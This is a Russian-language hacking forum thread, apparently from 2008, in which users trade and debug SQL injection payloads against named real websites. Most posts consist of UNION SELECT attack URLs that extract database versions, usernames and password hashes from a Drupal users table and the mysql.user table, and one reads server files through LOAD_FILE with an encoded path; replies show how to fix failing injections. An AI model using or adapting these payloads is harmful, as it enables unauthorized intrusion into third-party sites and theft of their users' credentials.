27.12.2008, 14:11
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Код:
http://www.mymaika.ru/page.php?id=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
подобрал, вроде 14. но ошибка
в чем трабл? |
|
|
27.12.2008, 14:25
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Трабла в том, что это 3-я ветка. В ней нету оператора объединения запросов union.
|
|
|
|
27.12.2008, 14:54
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
2 R1dex , sabe
http://www.astafiev.ru/topic.php?UID=-119+union+select+111,version()/*
Есть вывод  |
|
|
|
27.12.2008, 15:11
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Да, тут есть, но конкретно в том случае - нету. |
|
|
|
27.12.2008, 16:14
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
В соседней темы выкладывалась скуля
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--
Почему при
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7,8,9+from+drupalusers--
Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR  |
|
|
|
27.12.2008, 16:21
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Сообщение от Thrasher88
Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR потому что таблица находится в другой базе
Код:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4,5,6,7,8,9+from+garmenia.drupalusers--
Bonus
доступ к mysql.user:
Код:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user--
чтение фалов:
Код:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,LOAD_FILE(CHAR(47,104,111,109,101,47,121,101,115,111,117,100,111,47,119,119,119,47,99,104,97,110,110,101,108,95,100,101,116,97,105,108,46,112,104,112)),3,4,5,6,7,8,9--
Последний раз редактировалось Iceangel_; 27.12.2008 в 16:40..
|
|
|
|
27.12.2008, 16:25
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?
Последний раз редактировалось Octave_Parango; 27.12.2008 в 16:30..
|
|
|
|
27.12.2008, 16:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от Octave_Parango
Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.
|
|
|
|
27.12.2008, 16:37
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Сообщение от Nightmarе
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.
Пробовал, до полусотни докрутил.
|
|
|
|
27.12.2008, 16:43
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
2Octave_Parango дык мож там тока одна запись?)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
